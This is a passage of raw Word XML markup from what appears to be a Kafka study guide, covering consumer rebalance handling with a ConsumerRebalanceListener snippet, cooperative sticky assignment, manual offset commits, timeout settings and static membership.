          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if not handled properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0E44D" w14:textId="77777777" w:rsidR="00F4512C"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CC515C4">
          <v:rect id="_x0000_i3272" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03575B" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛠</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handling Consumer Rebalance in Large-Scale Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B21C9" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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1. Implement a Rebalance Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C133A"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Kafka provides ConsumerRebalanceListener to allow custom logic during rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA97F9"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nsumer.subscribe(Arrays.asList("topic1"), new ConsumerRebalanceListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443507B2"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    public void onPartitionsRevoked(Collection&lt;TopicPartition&gt; partitions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41750225"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        // Commit offsets or cleanup before losing ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E00E0C"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87BC92" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685A218D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public void onPartitionsAssigned(Collection&lt;TopicPartition&gt; partitions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C60971"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        // Seek to last committed offset if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C65317C"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71281811"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3042F5" w14:textId="77777777" w:rsidR="00F4512C"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FE0F505">
          <v:rect id="_x0000_i3273" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885715F" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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2. Use Cooperative Sticky Assignor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525AFE1C"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Kafka 2.4+ supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cooperative Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to minimize partition shuffling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D365A5"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artition.assignment.strategy=org.apache.kafka.clients.consumer.CooperativeStickyAssignor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF2CE1" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Helps maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sticky assignments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19998796" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Avoids </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stop-the-world</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rebalances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F342C9" w14:textId="77777777" w:rsidR="00F4512C"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4247B1C">
          <v:rect id="_x0000_i3274" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55E2D3" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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3. Commit Offsets Properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB8F44" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual commit</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (commitSync() or commitAsync()) after processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E42302" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Avoid committing offsets </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> actual processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031FCE82" w14:textId="77777777" w:rsidR="00F4512C"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693C726">
          <v:rect id="_x0000_i3275" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76420F57" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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4. Monitor and Tune Rebalance Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F536CB3"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Important configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DF5C2" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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ession.timeout.ms: Time to detect consumer failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149C813" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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ax.poll.interval.ms: Max delay between poll() calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D6E5F" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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heartbeat.interval.ms: Frequency of heartbeat to Kafka broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD01AD0" w14:textId="77777777" w:rsidR="00F4512C"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E4BDED0">
          <v:rect id="_x0000_i3276" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA17167" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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5. Spread Consumer Startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888866F"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If many consumers start simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089A40A5" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Introduce </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delays</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>staggered starts</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid mass rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AEB822" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Useful in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>autoscaling environments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DAC10C" w14:textId="77777777" w:rsidR="00F4512C"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FAF9B85">
          <v:rect id="_x0000_i3277" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CDB41" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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6. Use Static Membership (Kafka 2.3+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE403B0"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Avoid rebalancing when a consumer restarts by setting a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static group.instance.id</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E3DD2"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group.instance.id=consumer-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614674AF" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Consumers get the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F73DC8" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170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Great for stateful consumers like </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A0430" w14:textId="77777777" w:rsidR="00F4512C"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EDFB81">
          <v:rect id="_x0000_i3278" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F79CF" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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86"/>
        <w:gridCol w:w="4250"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5AEC512F" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3900C1E8" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D1BB499" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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Benefit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="653EC4CB" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F35ECD"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nsumerRebalanceListener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3188B970"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ntrol before and after rebalance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="2887968C" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3410880C"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operativeStickyAssignor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79400833"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Less disruptive rebalances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="557FF1BF" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A742D0"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group.instance.id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FBB0A1E"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table partition assignment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="779230F5" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="286A05DA"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anual offset commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066F5165"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revent message loss/duplication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="2F85E20A" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E6D19B8"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onitor consumer lag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A808547" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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Detect slow consumers causing rebalances</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42D62219" w14:textId="4206B75E"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BB97D96">
          <v:rect id="_x0000_i3279" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE6FF83" w14:textId="3E1B1AA3" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00956459" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="817" w:name="_Toc196308297"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka's consumer rebalance process and strategies for handling it when scaling out consumer groups</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="817"/>
    </w:p>
    <w:p w14:paraId="5D9DC167" w14:textId="589D02DB" w:rsidR="008C5CA5" w:rsidRPr="004269A3" w:rsidRDefault="008C5CA5" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>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Kafka's Consumer Rebalance Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08116955"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onsumer Rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka refers to the process where </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition ownership</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is reassigned among consumers within a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>balanced workload</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when consumers </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>join, leave, or crash</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
